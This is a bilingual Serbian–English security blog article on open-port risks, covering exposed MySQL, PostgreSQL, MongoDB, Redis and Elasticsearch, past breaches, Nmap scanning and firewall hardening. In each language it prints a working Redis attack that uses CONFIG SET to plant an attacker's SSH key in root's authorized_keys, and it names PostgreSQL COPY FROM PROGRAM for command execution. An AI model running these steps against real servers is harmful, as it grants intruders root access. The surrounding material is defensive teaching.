Otvoreni portovi — Rizici i zastita

Objavljeno: 8. april 2026. · Vreme citanja: 14 min

Sadrzaj

  1. Sta su portovi i kako rade
  2. Najrizicniji otvoreni portovi
  3. Realni bezbednosni incidenti
  4. Nmap — skeniranje portova
  5. Metode zastite
  6. Cloud security groups
  7. Cesto postavljana pitanja
  8. Reference
65,535
Ukupno TCP portova
28,000
MongoDB servera hakovano 2017. (Shodan)
4.7M
Redis instanci vidljivih na Shodan-u
15 sec
Vreme da bot pronadje nov port (SANS)

1. Sta su portovi i kako rade

Mrezni portovi su virtuelne tacke za komunikaciju na racunaru. Kada vasa aplikacija slusa na odredjenom portu, ona prima podatke od klijenata koji se povezuju na taj port. TCP/IP protokol koristi 16-bitne brojeve portova, sto daje raspon od 0 do 65,535.

Kategorije portova

RasponNazivOpis
0-1023Well-known portsRezervisani za standardne servise (HTTP 80, HTTPS 443, SSH 22)
1024-49151Registered portsRegistrovani za specificne aplikacije (MySQL 3306, PostgreSQL 5432)
49152-65535Dynamic/PrivateKoriste se za privremene klijentske konekcije

TCP vs UDP

TCP (Transmission Control Protocol) uspostavlja pouzdanu konekciju putem "three-way handshake" (SYN, SYN-ACK, ACK). Koristi se za HTTP, SSH, baze podataka. UDP (User Datagram Protocol) je bez konekcije, brzi ali nepouzdaniji. Koristi se za DNS (port 53), streaming, gaming.

2. Najrizicniji otvoreni portovi

Port 3306 — MySQL

MySQL baza podataka podrazumevano slusa na portu 3306. Ako je javno dostupan, napadac moze pokusati brute-force napad na kredencijale ili eksploatisati poznate ranjivosti. Mnoge MySQL instalacije imaju slab root password ili ga uopste nemaju.

Rizik: Javno izlozen MySQL port moze dovesti do potpunog preuzimanja baze podataka, krade korisnickih podataka, i ransomware napada.

Port 5432 — PostgreSQL

PostgreSQL koristi port 5432. Iako ima bolju podrazumevanu bezbednosnu konfiguraciju od MySQL-a (zahteva autentifikaciju), izlaganje na javnoj mrezi i dalje predstavlja rizik. Napadaci koriste pg_read_file() i COPY ... FROM PROGRAM za izvrsavanje komandi na OS nivou.

Port 27017 — MongoDB

MongoDB je bio notorno nesiguran u starijim verzijama — podrazumevano nije zahtevao autentifikaciju i slusao je na svim interfejsima. Ovo je dovelo do masovnih ransomware napada 2017. godine.

Port 6379 — Redis

Redis podrazumevano nema lozinku i slusa na svim interfejsima. Napadac sa pristupom moze koristiti CONFIG SET da upise SSH kljuceve na server i dobije potpun pristup:

# Napadac moze izvrsiti sledece ako je Redis otvoren:
redis-cli -h zrtva.com
CONFIG SET dir /root/.ssh/
CONFIG SET dbfilename "authorized_keys"
SET payload "\n\nssh-rsa AAAA... napadac@evil\n\n"
SAVE
# Sada napadac ima SSH pristup serveru

Port 9200 — Elasticsearch

Elasticsearch nema podrazumevanu autentifikaciju u besplatnoj verziji. Javno izlozen Elasticsearch cesto sadrzi osetljive podatke (logove, korisnicke podatke, financijske zapise). Shodan redovno pronalazi hiljade nezasticenih Elasticsearch instanci.

Port 21 — FTP

FTP (File Transfer Protocol) salje kredencijale u plain text-u bez ikakve enkripcije. Svako na istoj mrezi moze presresti korisnicko ime i lozinku.

Port 23 — Telnet

Telnet je potpuno neenkriptovan protokol za udaljeni pristup. Koriscen je pre SSH-a i nema nikakvog opravdanja za koriscenje danas.

Preporuka: Zamenite FTP sa SFTP (port 22) ili SCP. Zamenite Telnet sa SSH (port 22). Nikada ne koristite neenkriptovane protokole u produkciji.

3. Realni bezbednosni incidenti

MongoDB Ransomware (januar 2017)

U januaru 2017, vise napadackih grupa je sistematski skeniralo internet trazeci MongoDB instance bez autentifikacije. Nasli su ih desetine hiljada. Napadaci su brisali baze podataka i ostavljali poruku sa zahtevom za otkupninu (obicno 0.2 BTC).

Prema Shodan-u, preko 28,000 MongoDB servera je bilo kompromitovano u prvih nekoliko nedelja. Jedan napadac pod imenom "Harak1r1" je sam kompromitovao preko 2,000 baza.

Izvor: Bleeping Computer, "MongoDB Apocalypse", januar 2017

Redis neovlasceni pristup

Istrazivaci su 2015. godine demonstrirali kako napadac moze zloupotrebiti javno dostupan Redis da upise SSH kljuc na server i dobije potpun root pristup — bez poznavanja ikakve lozinke. Tehnika koristi CONFIG SET komandu za promenu direktorijuma za cuvanje podataka.

Prema Shodan statistikama, milioni Redis instanci i dalje slusaju na javnim IP adresama, mnoge bez ikakve autentifikacije.

Izvor: Antirez blog, "A few things about Redis security", 2015

Elasticsearch data breach-evi

U decembru 2019. godine, istrazivac Bob Diachenko je pronasao nezasticen Elasticsearch klaster koji je izlagao 1.2 milijarde zapisa sa licnim podacima (ime, email, telefon, LinkedIn profili). Podaci su bili objedinjeni iz vise izvora (data enrichment servisi).

Izvor: DataViper/Vinny Troia, "1.2 Billion Records Found Exposed Online", 2019

4. Nmap — skeniranje portova

Nmap (Network Mapper) je najpopularniji open-source alat za skeniranje mreze i otkrivanje portova. Koriste ga i bezbednosni strucnjaci i sistem administratori.

Osnovne Nmap komande

# Skeniranje najcescih 1000 portova
nmap vas-server.com

# Skeniranje SVIH portova (0-65535)
nmap -p- vas-server.com

# Skeniranje sa detekcijom servisa i verzija
nmap -sV vas-server.com

# Skeniranje specificnih portova
nmap -p 22,80,443,3306,5432,6379,27017,9200 vas-server.com

# Agresivno skeniranje (OS detekcija, skripte, traceroute)
nmap -A vas-server.com

# UDP skeniranje (sporije ali vazno)
nmap -sU -p 53,161,123 vas-server.com

# Skeniranje sa NSE skriptama za ranjivosti
nmap --script vuln vas-server.com

Tumacenje rezultata

PORT      STATE    SERVICE    VERSION
22/tcp    open     ssh        OpenSSH 8.9
80/tcp    open     http       nginx 1.18
443/tcp   open     ssl/http   nginx 1.18
3306/tcp  filtered mysql      <-- firewall blokira, dobro!
6379/tcp  open     redis      Redis 7.0.5  <-- OPASNO!
9200/tcp  closed   wap-wsp    <-- port zatvoren, OK
StanjeZnacenjeAkcija
openPort aktivno slusaProveriti da li treba biti javno dostupan
closedPort dostupan ali nista ne slusaGeneralno OK
filteredFirewall blokira pristupDobra konfiguracija za interne servise

5. Metode zastite

5.1 Firewall pravila (iptables / ufw)

# UFW (Ubuntu Uncomplicated Firewall) — preporuceno za pocetnike
sudo ufw default deny incoming
sudo ufw default allow outgoing
sudo ufw allow 22/tcp      # SSH
sudo ufw allow 80/tcp      # HTTP
sudo ufw allow 443/tcp     # HTTPS
sudo ufw enable

# Dozvolite pristup MySQL-u samo sa specificne IP adrese
sudo ufw allow from 10.0.1.5 to any port 3306

# iptables — naprednija konfiguracija
iptables -A INPUT -p tcp --dport 6379 -s 10.0.1.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 6379 -j DROP

5.2 Bind na localhost

Konfigurisite servise da slusaju samo na 127.0.0.1 umesto na 0.0.0.0:

# MySQL (my.cnf)
[mysqld]
bind-address = 127.0.0.1

# Redis (redis.conf)
bind 127.0.0.1 -::1

# MongoDB (mongod.conf)
net:
  bindIp: 127.0.0.1

# Elasticsearch (elasticsearch.yml)
network.host: 127.0.0.1

5.3 SSH tunelovanje

Za pristup internim servisima sa udaljene lokacije, koristite SSH tunel umesto javnog izlaganja porta:

# Kreiranje SSH tunela do udaljenog MySQL-a
ssh -L 3306:localhost:3306 user@server.com

# Sada mozete pristupiti udaljenom MySQL-u lokalno
mysql -h 127.0.0.1 -P 3306 -u korisnik -p

5.4 VPN za interne servise

WireGuard ili OpenVPN za pristup internim servisima. Svi servisi baze podataka i admin paneli treba da budu dostupni samo preko VPN-a.

6. Cloud security groups

AWS Security Groups

# AWS CLI — kreiranje security grupe sa minimalnim pristupom
aws ec2 create-security-group \
  --group-name web-server-sg \
  --description "Web server security group"

# Dozvolite samo HTTP i HTTPS
aws ec2 authorize-security-group-ingress \
  --group-name web-server-sg \
  --protocol tcp --port 80 --cidr 0.0.0.0/0

aws ec2 authorize-security-group-ingress \
  --group-name web-server-sg \
  --protocol tcp --port 443 --cidr 0.0.0.0/0

# SSH samo sa vase IP adrese
aws ec2 authorize-security-group-ingress \
  --group-name web-server-sg \
  --protocol tcp --port 22 --cidr 203.0.113.50/32

Google Cloud Firewall

# GCP — dozvolite samo web saobracaj
gcloud compute firewall-rules create allow-web \
  --allow tcp:80,tcp:443 \
  --source-ranges 0.0.0.0/0 \
  --target-tags web-server

# Blokirajte sve baze podataka sa interneta
gcloud compute firewall-rules create deny-db \
  --action deny \
  --rules tcp:3306,tcp:5432,tcp:27017,tcp:6379,tcp:9200 \
  --source-ranges 0.0.0.0/0 \
  --priority 100
Zlatno pravilo: Princip najmanjeg pristupa (Principle of Least Privilege). Otvorite samo portove koji apsolutno moraju biti javno dostupni. Sve ostalo treba da bude za firewall-om ili dostupno samo putem VPN-a.

7. Cesto postavljana pitanja

P: Da li je dovoljno promeniti podrazumevani port (npr. MySQL sa 3306 na 33060)?
O: Ne. "Security through obscurity" nije prava zastita. Nmap moze skenirati svih 65,535 portova, a Shodan automatski detektuje servise bez obzira na port. Koristite firewall i autentifikaciju.
P: Kako da proverim da li moji portovi javno vidljivi?
O: Koristite Shodan.io za proveru sa internet perspektive, ili pokrenite nmap -sV -p- vas-server.com sa druge masine. Takodje, nas Web Security Scanner proverava najcescih rizicnih portova.
P: Da li je port 22 (SSH) bezbedan da bude otvoren?
O: SSH je dizajniran da bude javno dostupan, ali preduzmite mere: koristite kljuceve umesto lozinki, zabranite root login, koristite fail2ban za brute-force zastitu, i razmotrite port knocking.

8. Reference

Skenirajte svoj sajt besplatno →

Open Ports — Risks and Protection

Published: April 8, 2026 · Reading time: 14 min

Table of Contents

  1. What are ports and how they work
  2. Most dangerous open ports
  3. Real-world security incidents
  4. Nmap — port scanning
  5. Protection methods
  6. Cloud security groups
  7. Frequently asked questions
  8. References
65,535
Total TCP ports
28,000
MongoDB servers hacked in 2017 (Shodan)
4.7M
Redis instances visible on Shodan
15 sec
Time for bot to find new port (SANS)

1. What are ports and how they work

Network ports are virtual communication endpoints on a computer. When your application listens on a specific port, it receives data from clients connecting to that port. TCP/IP protocol uses 16-bit port numbers, giving a range from 0 to 65,535.

Port categories

RangeNameDescription
0-1023Well-known portsReserved for standard services (HTTP 80, HTTPS 443, SSH 22)
1024-49151Registered portsRegistered for specific applications (MySQL 3306, PostgreSQL 5432)
49152-65535Dynamic/PrivateUsed for temporary client connections

TCP vs UDP

TCP (Transmission Control Protocol) establishes a reliable connection via a "three-way handshake" (SYN, SYN-ACK, ACK). Used for HTTP, SSH, databases. UDP (User Datagram Protocol) is connectionless, faster but less reliable. Used for DNS (port 53), streaming, gaming.

2. Most dangerous open ports

Port 3306 — MySQL

MySQL database listens on port 3306 by default. If publicly accessible, attackers can attempt brute-force attacks on credentials or exploit known vulnerabilities. Many MySQL installations have a weak root password or none at all.

Risk: A publicly exposed MySQL port can lead to complete database takeover, user data theft, and ransomware attacks.

Port 5432 — PostgreSQL

PostgreSQL uses port 5432. While it has better default security configuration than MySQL (requires authentication), exposing it to the public internet still poses risks. Attackers use pg_read_file() and COPY ... FROM PROGRAM to execute OS-level commands.

Port 27017 — MongoDB

MongoDB was notoriously insecure in older versions — it required no authentication by default and listened on all interfaces. This led to massive ransomware attacks in 2017.

Port 6379 — Redis

Redis has no password by default and listens on all interfaces. An attacker with access can use CONFIG SET to write SSH keys to the server and gain full access:

# Attacker can execute the following if Redis is open:
redis-cli -h victim.com
CONFIG SET dir /root/.ssh/
CONFIG SET dbfilename "authorized_keys"
SET payload "\n\nssh-rsa AAAA... attacker@evil\n\n"
SAVE
# Now the attacker has SSH access to the server

Port 9200 — Elasticsearch

Elasticsearch has no default authentication in the free version. A publicly exposed Elasticsearch instance often contains sensitive data (logs, user data, financial records). Shodan regularly finds thousands of unprotected Elasticsearch instances.

Port 21 — FTP

FTP (File Transfer Protocol) sends credentials in plain text without any encryption. Anyone on the same network can intercept the username and password.

Port 23 — Telnet

Telnet is a completely unencrypted remote access protocol. It was used before SSH and there is no justification for using it today.

Recommendation: Replace FTP with SFTP (port 22) or SCP. Replace Telnet with SSH (port 22). Never use unencrypted protocols in production.

3. Real-world security incidents

MongoDB Ransomware (January 2017)

In January 2017, multiple attacker groups systematically scanned the internet for MongoDB instances without authentication. They found tens of thousands. Attackers deleted databases and left ransom notes (typically 0.2 BTC).

According to Shodan, over 28,000 MongoDB servers were compromised in the first few weeks. One attacker going by "Harak1r1" alone compromised over 2,000 databases.

Source: Bleeping Computer, "MongoDB Apocalypse", January 2017

Redis unauthorized access

In 2015, researchers demonstrated how an attacker could abuse a publicly accessible Redis instance to write an SSH key to the server and gain full root access — without knowing any password. The technique uses the CONFIG SET command to change the data save directory.

According to Shodan statistics, millions of Redis instances still listen on public IP addresses, many without any authentication.

Source: Antirez blog, "A few things about Redis security", 2015

Elasticsearch data breaches

In December 2019, researcher Bob Diachenko found an unprotected Elasticsearch cluster exposing 1.2 billion records with personal data (names, emails, phone numbers, LinkedIn profiles). The data had been aggregated from multiple sources (data enrichment services).

Source: DataViper/Vinny Troia, "1.2 Billion Records Found Exposed Online", 2019

4. Nmap — port scanning

Nmap (Network Mapper) is the most popular open-source tool for network scanning and port discovery. It is used by both security professionals and system administrators.

Basic Nmap commands

# Scan the most common 1000 ports
nmap your-server.com

# Scan ALL ports (0-65535)
nmap -p- your-server.com

# Scan with service and version detection
nmap -sV your-server.com

# Scan specific ports
nmap -p 22,80,443,3306,5432,6379,27017,9200 your-server.com

# Aggressive scan (OS detection, scripts, traceroute)
nmap -A your-server.com

# UDP scan (slower but important)
nmap -sU -p 53,161,123 your-server.com

# Scan with NSE vulnerability scripts
nmap --script vuln your-server.com

Reading results

PORT      STATE    SERVICE    VERSION
22/tcp    open     ssh        OpenSSH 8.9
80/tcp    open     http       nginx 1.18
443/tcp   open     ssl/http   nginx 1.18
3306/tcp  filtered mysql      <-- firewall blocking, good!
6379/tcp  open     redis      Redis 7.0.5  <-- DANGEROUS!
9200/tcp  closed   wap-wsp    <-- port closed, OK
StateMeaningAction
openPort is actively listeningCheck if it needs to be public
closedPort reachable but nothing listeningGenerally OK
filteredFirewall blocking accessGood config for internal services

5. Protection methods

5.1 Firewall rules (iptables / ufw)

# UFW (Ubuntu Uncomplicated Firewall) — recommended for beginners
sudo ufw default deny incoming
sudo ufw default allow outgoing
sudo ufw allow 22/tcp      # SSH
sudo ufw allow 80/tcp      # HTTP
sudo ufw allow 443/tcp     # HTTPS
sudo ufw enable

# Allow MySQL access only from a specific IP
sudo ufw allow from 10.0.1.5 to any port 3306

# iptables — advanced configuration
iptables -A INPUT -p tcp --dport 6379 -s 10.0.1.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 6379 -j DROP

5.2 Bind to localhost

Configure services to listen only on 127.0.0.1 instead of 0.0.0.0:

# MySQL (my.cnf)
[mysqld]
bind-address = 127.0.0.1

# Redis (redis.conf)
bind 127.0.0.1 -::1

# MongoDB (mongod.conf)
net:
  bindIp: 127.0.0.1

# Elasticsearch (elasticsearch.yml)
network.host: 127.0.0.1

5.3 SSH tunneling

To access internal services from a remote location, use an SSH tunnel instead of publicly exposing the port:

# Create SSH tunnel to remote MySQL
ssh -L 3306:localhost:3306 user@server.com

# Now you can access remote MySQL locally
mysql -h 127.0.0.1 -P 3306 -u user -p

5.4 VPN for internal services

Use WireGuard or OpenVPN for internal service access. All database services and admin panels should only be accessible via VPN.

6. Cloud security groups

AWS Security Groups

# AWS CLI — create security group with minimal access
aws ec2 create-security-group \
  --group-name web-server-sg \
  --description "Web server security group"

# Allow only HTTP and HTTPS
aws ec2 authorize-security-group-ingress \
  --group-name web-server-sg \
  --protocol tcp --port 80 --cidr 0.0.0.0/0

aws ec2 authorize-security-group-ingress \
  --group-name web-server-sg \
  --protocol tcp --port 443 --cidr 0.0.0.0/0

# SSH only from your IP address
aws ec2 authorize-security-group-ingress \
  --group-name web-server-sg \
  --protocol tcp --port 22 --cidr 203.0.113.50/32

Google Cloud Firewall

# GCP — allow only web traffic
gcloud compute firewall-rules create allow-web \
  --allow tcp:80,tcp:443 \
  --source-ranges 0.0.0.0/0 \
  --target-tags web-server

# Block all databases from the internet
gcloud compute firewall-rules create deny-db \
  --action deny \
  --rules tcp:3306,tcp:5432,tcp:27017,tcp:6379,tcp:9200 \
  --source-ranges 0.0.0.0/0 \
  --priority 100
Golden rule: Principle of Least Privilege. Only open ports that absolutely must be publicly accessible. Everything else should be behind a firewall or accessible only via VPN.

7. Frequently asked questions

Q: Is it enough to just change the default port (e.g., MySQL from 3306 to 33060)?
A: No. "Security through obscurity" is not real protection. Nmap can scan all 65,535 ports, and Shodan automatically detects services regardless of port. Use a firewall and authentication.
Q: How can I check if my ports are publicly visible?
A: Use Shodan.io to check from an internet perspective, or run nmap -sV -p- your-server.com from another machine. Also, our Web Security Scanner checks for the most common risky ports.
Q: Is port 22 (SSH) safe to leave open?
A: SSH is designed to be publicly accessible, but take precautions: use keys instead of passwords, disable root login, use fail2ban for brute-force protection, and consider port knocking.

8. References

Scan your site for free →
SSL/TLS vodicSSL/TLS Guide HTTP Security HeadersHTTP Security Headers XSS napadiXSS Attacks SQL InjectionSQL Injection CSRF napadiCSRF Attacks DNS bezbednostDNS Security API bezbednostAPI Security